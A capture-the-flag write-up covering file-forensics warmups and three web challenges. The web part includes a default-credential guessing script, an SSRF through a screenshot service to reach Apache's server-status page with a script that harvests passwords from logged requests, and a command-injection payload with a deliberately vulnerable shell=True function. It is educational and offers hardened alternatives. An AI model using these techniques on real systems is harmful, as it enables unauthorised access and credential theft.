Warmups - Tsunami

Downloading the file and running the file command, we get its type: an audio file.

Let’s think simple and open it straight up in an audio editor; here I chose the open-source Audacity.

And that’s it, we got the flag!

Warmups - Pimple

Following the exact same procedure as for Tsunami, we have:

Okay, so what’s a GIMP XCF image? A quick Google search led me to some interesting information, including the official documentation. Following this great article, I tried an online converter, but it did not seem to work…

So let’s check the GIMP package size, power off our attack machine, take a snapshot, then power it on again and sudo apt install gimp.

Renaming the file to pimple.xcf (the extension only matters to GIMP’s file picker; the file command already went by the magic bytes) and opening it in GIMP, we get the flag.

… Those morose eyes were exactly like mine when I worked on some challenges.

Warmups - Bass64

Oh, once again, hello John.

This challenge is pretty straightforward. Download the file, open it, then resize the editor window to a suitable width so the text lines up, and we have

Base64-decoding it directly, we instantly get the flag.

Warmups - Read The Rules

As they said, please be a civilized player and read the rules. The flag is in the page’s source code.

Warmups - 2EZ

Another challenge from John. Let’s follow our procedure from the previous challenges.

Seems like the file command was not much use here. Let’s try strings.

JFIF… so it should be an image file. Renaming its extension to jpg or gif changed nothing (file and most viewers go by the signature, not the extension), and file’s magic database still did not recognize it. So the file signature itself must be wrong.

Opening it up in a hex editor, we can clearly see our guess was right.

So we change the first 4 bytes to the JFIF file signature (FF D8 FF E0: the SOI marker followed by the APP0 marker), leave the rest of the file alone, and we get the flag!
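The same check done in code, as an added example for the Pimple and 2EZ steps above (not the challenge author’s code): identify a file by its leading bytes the way file does, spot a JFIF whose signature has been overwritten by the 'JFIF\0' identifier that survives at offset 6, and rewrite only the first four bytes. The sample bytes at the bottom are constructed, not the real challenge file.

```python
#!/usr/bin/env python3
"""Identify a file by its magic bytes and repair a JPEG/JFIF whose leading
bytes have been overwritten. Added example for this write-up, not code from
the challenge or its author; the sample below is constructed."""
import sys

# Well-known signatures (the kind of table the `file` command consults).
MAGICS = {
    b"\xff\xd8\xff": "JPEG image",            # SOI marker followed by another marker
    b"gimp xcf ": "GIMP XCF image",          # XCF starts with the ASCII string "gimp xcf "
    b"RIFF": "RIFF container (WAV/AVI)",
    b"fLaC": "FLAC audio",
    b"GIF8": "GIF image",
    b"\x89PNG\r\n\x1a\n": "PNG image",
}

# SOI (FF D8) followed by the APP0 marker (FF E0): the first four bytes of a JFIF file.
JFIF_HEADER = b"\xff\xd8\xff\xe0"


def identify(data: bytes):
    """Return a type name based on the leading bytes, or None if unknown."""
    for magic, name in MAGICS.items():
        if data.startswith(magic):
            return name
    return None


def looks_like_damaged_jfif(data: bytes) -> bool:
    """JFIF keeps the ASCII identifier 'JFIF\\0' at offset 6 (after SOI, the APP0
    marker and the 2-byte APP0 length). If that is present but the first four
    bytes are not SOI+APP0, the signature has been tampered with."""
    return data[6:11] == b"JFIF\x00" and data[:4] != JFIF_HEADER


def repair_jfif(data: bytes) -> bytes:
    """Rewrite only the first four bytes; everything after them is kept as-is."""
    if not looks_like_damaged_jfif(data):
        raise ValueError("input is not a JFIF file with a corrupted signature")
    return JFIF_HEADER + data[4:]


# Constructed sample: a minimal JFIF APP0 segment (length 0x0010) whose first
# four bytes were zeroed, then an EOI marker. Not a real picture, just a header.
BROKEN_SAMPLE = (
    b"\x00\x00\x00\x00"                          # overwritten SOI + APP0 marker
    + b"\x00\x10"                                # APP0 segment length (16)
    + b"JFIF\x00"                                # identifier
    + b"\x01\x01\x00\x00\x01\x00\x01\x00\x00"    # version 1.1, units, density, thumbnail size
    + b"\xff\xd9"                                # EOI
)

if __name__ == "__main__":
    if len(sys.argv) == 3:
        # Usage: python3 fixmagic.py <input> <output>
        with open(sys.argv[1], "rb") as f:
            blob = f.read()
        print("detected:", identify(blob))
        if looks_like_damaged_jfif(blob):
            with open(sys.argv[2], "wb") as f:
                f.write(repair_jfif(blob))
            print("wrote repaired JFIF to", sys.argv[2])
    else:
        print("sample before:", identify(BROKEN_SAMPLE))
        print("sample after: ", identify(repair_jfif(BROKEN_SAMPLE)))
```

Run it with no arguments to see the constructed sample go from unrecognized to "JPEG image", or with an input and output path to patch a real file. The repair deliberately touches nothing past byte 4; if the 'JFIF\0' identifier is not where it belongs, the corruption is deeper than a signature swap and the script refuses rather than guessing.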

Web - Swaggy

Following the URL, we get to a pretty clean website.

Messing around a bit, we found that this site uses a GUI to issue a curl GET request to an API endpoint. Execute sent an HTTP GET request to the endpoint, but it required HTTP Basic authentication, which is just ‘user:password’ base64-encoded in the Authorization header. I tried ‘user:password’ but it returned 403: Invalid credentials.

So I tried another default credential, ‘admin:admin’, and to my surprise it returned the flag quite easily.
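The Basic-auth exchange above in code, as an added example (not the challenge’s code): build the Authorization header by hand, decode one back out of a captured request, and walk a short default-credential list until the endpoint answers with a 2xx. The endpoint URL and the credential list are assumptions for illustration.

```python
#!/usr/bin/env python3
"""Send HTTP GETs with Basic authentication and try a short list of default
credentials. Added example for the Swaggy write-up, not the challenge code.
The endpoint URL and credential list are assumptions."""
import base64
import sys
import urllib.error
import urllib.request

# A deliberately tiny default-credential list; extend it from a wordlist if needed.
DEFAULT_CREDS = [("user", "password"), ("admin", "admin"), ("admin", "password")]


def basic_auth_header(username: str, password: str) -> str:
    """HTTP Basic is 'Basic ' + base64('user:pass'): an encoding, not encryption,
    so it is only as private as the transport it travels over."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode("ascii")
    return f"Basic {token}"


def decode_basic_auth(header: str):
    """Inverse of the above: recover (user, pass) from an Authorization header,
    as you would when reading it out of a captured request. None if not Basic."""
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic":
        return None
    user, _, password = base64.b64decode(token).decode().partition(":")
    return user, password


def get_with_basic_auth(url: str, username: str, password: str):
    """Return (status, body) for one attempt; a 401/403 is a result, not an error."""
    req = urllib.request.Request(
        url, headers={"Authorization": basic_auth_header(username, password)})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode(errors="replace")


def try_default_creds(url: str, creds=DEFAULT_CREDS):
    """Stop at the first credential pair the endpoint accepts (any 2xx)."""
    for username, password in creds:
        status, body = get_with_basic_auth(url, username, password)
        print(f"{username}:{password} -> {status}")
        if 200 <= status < 300:
            return username, password, body
    return None


if __name__ == "__main__":
    # Usage: python3 swaggy.py http://target/api/endpoint   (URL is an assumption)
    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8000/api/flag"
    print(try_default_creds(target))
```

Note the loop matches on success (2xx) rather than on a specific failure code: a server following the spec answers a bad Basic credential with 401 and a WWW-Authenticate header, but this one returned 403, and many custom APIs do.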

Web - Titanic

Following the URL, we get to a website with a pretty decent UI. On a side note, you should really press that ‘Watch Video’ button; quite informative.

Right at the top of the nav bar, we have the admin panel.

I tried some common credentials, as well as checking the source code and the requests, but found nothing particularly interesting, except that it used GET for authentication, which is strongly discouraged: the username and password end up in the URL, and so in browser history, proxies and server logs. So I returned to the home page, and it led me to another engrossing service.

I tried it with https://google.com and it returned something like a screenshot of Google. A flashback to HTB’s Love box: a server that fetches arbitrary URLs for you can often be pointed at hosts it should not reach (SSRF), so I tested whether it could also capture sites on the local network.

That got me a glimpse of a loading page, which was not much use in this case. I checked Wappalyzer and found that the server ran Apache. A quick Google search revealed that Apache’s mod_status serves a server-status page which, when left enabled and reachable, lists recent requests including their full request lines, so it can expose what would otherwise only be in the access log.

And it worked: the screenshot service rendered the server-status page, and because the login went over GET, the request parameters listed there contained a user’s credentials. Logging in with that account, we got the flag.
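The harvesting step above, as an added example for the Titanic write-up (not the challenge’s code): scan text for HTTP request lines of the form METHOD path HTTP/x.y, which is how mod_status and access logs print them, split each query string, and keep the parameters whose names look like credentials. The sample text is constructed to resemble the request column of a server-status page; the real page is an HTML table, so in practice you would fetch it (through the screenshot service or directly) and run this over the raw HTML.

```python
#!/usr/bin/env python3
"""Pull credentials out of request lines shown on an Apache mod_status page.
Added example for the Titanic write-up, not the challenge code. SAMPLE is a
constructed approximation of server-status output, not captured data."""
import re
from urllib.parse import urlsplit, parse_qs

# mod_status (and most access logs) print the request line as: METHOD path HTTP/x.y
REQUEST_LINE = re.compile(r"\b(GET|POST|HEAD|PUT|DELETE)\s+(/\S*)\s+HTTP/\d(?:\.\d)?")
# Parameter names that typically carry secrets; case-insensitive substring match.
SECRET_KEYS = ("pass", "pwd", "token", "secret", "key", "user", "login", "email")

# Constructed sample: fragments of what a server-status request table might show.
SAMPLE = """
0-0 1234 0/12/12 _ 0.03 5 0 0.0 0.00 0.01 127.0.0.1 http/1.1 titanic.local:80 GET /server-status HTTP/1.1
0-1 1235 0/7/7 W 0.01 2 0 0.0 0.00 0.00 10.0.0.5 http/1.1 titanic.local:80 GET /admin/login?username=captain&password=iceberg1912 HTTP/1.1
0-2 1236 0/3/3 _ 0.00 9 0 0.0 0.00 0.00 10.0.0.7 http/1.1 titanic.local:80 GET /static/app.js HTTP/1.1
0-3 1237 0/1/1 _ 0.00 1 0 0.0 0.00 0.00 10.0.0.9 http/1.1 titanic.local:80 POST /api/screenshot HTTP/1.1
"""


def extract_requests(text: str):
    """Return every (method, path) pair found in the text."""
    return [(m.group(1), m.group(2)) for m in REQUEST_LINE.finditer(text)]


def interesting_params(path: str):
    """Split the query string and keep parameters whose names look like credentials."""
    qs = parse_qs(urlsplit(path).query, keep_blank_values=True)
    return {k: v for k, v in qs.items() if any(s in k.lower() for s in SECRET_KEYS)}


def harvest_credentials(text: str):
    """Map each 'METHOD /path' that carried credential-like parameters to them."""
    found = {}
    for method, path in extract_requests(text):
        params = interesting_params(path)
        if params:
            found[f"{method} {urlsplit(path).path}"] = params
    return found


if __name__ == "__main__":
    for req, params in harvest_credentials(SAMPLE).items():
        print(req, params)
```

Two defensive takeaways follow from the same script: a login form that uses POST would show up here with an empty query string and leak nothing, and a server-status page restricted to localhost (Require local in the Location block) or disabled outright would not have been reachable through the screenshot service in the first place.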

Web - Confidentiality

Another John Hammond challenge, it seems.

So I just followed the placeholder, and it gave me something that looks like the output of ls -l.

Looks like this site takes our input, appends it to ls -l and runs the whole string in a shell, so anything after a command separator runs as a command of its own. So here comes the payload.

And that’s it, we got the flag. You can also use .; cat flag.txt if you like: the dot keeps ls -l happy, the semicolon ends that command, and cat runs as the next one.
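The bug behind Confidentiality, reconstructed as an added example (we never saw the challenge’s source, so this is an illustration, not its code): a directory listing that glues user input onto ls -l and hands the string to a shell, beside a version that passes an argument list with no shell and an allow-list on the name. The payload is the one from the write-up, with echo INJECTED standing in for cat flag.txt.

```python
#!/usr/bin/env python3
"""Command injection via 'ls -l ' + input with shell=True, and the hardened form.
Added example for the Confidentiality write-up, not the challenge's source."""
import re
import subprocess
import sys

# The write-up's payload shape: '.' satisfies ls, ';' ends that command, and
# whatever follows runs as a second command. 'echo INJECTED' stands in for 'cat flag.txt'.
PAYLOAD = ".; echo INJECTED"

# Allow-list for the hardened version: letters, digits, dot, dash, underscore, slash.
SAFE_NAME = re.compile(r"^[A-Za-z0-9._\-/]+$")


def list_dir_vulnerable(user_input: str) -> str:
    """String concatenation + shell=True: the user controls the rest of the command line."""
    result = subprocess.run("ls -l " + user_input, shell=True,
                            capture_output=True, text=True)
    return result.stdout


def list_dir_hardened(user_input: str) -> str:
    """Argument list, no shell, allow-listed input. Metacharacters such as ';', '|',
    '$(' and backticks are never interpreted because no shell is involved; the
    regex rejects them anyway, and '..' components are blocked to stop directory walking."""
    if not SAFE_NAME.fullmatch(user_input) or ".." in user_input.split("/"):
        raise ValueError(f"rejected path: {user_input!r}")
    # '--' makes sure a name starting with '-' is not parsed as an ls option.
    result = subprocess.run(["ls", "-l", "--", user_input],
                            capture_output=True, text=True, check=True)
    return result.stdout


def hardened_rejects(user_input: str) -> bool:
    """True if the hardened version refuses the input or ls fails on it."""
    try:
        list_dir_hardened(user_input)
        return False
    except (ValueError, subprocess.CalledProcessError):
        return True


if __name__ == "__main__":
    arg = sys.argv[1] if len(sys.argv) > 1 else PAYLOAD
    print("--- vulnerable ---")
    print(list_dir_vulnerable(arg))
    print("--- hardened ---")
    try:
        print(list_dir_hardened(arg))
    except ValueError as e:
        print(e)
```

Run it without arguments: the vulnerable path prints the listing followed by INJECTED, the hardened path refuses the input before ls ever runs. Dropping the shell is the fix that matters; the allow-list is belt and braces, and the -- guards against option injection, which survives even without a shell.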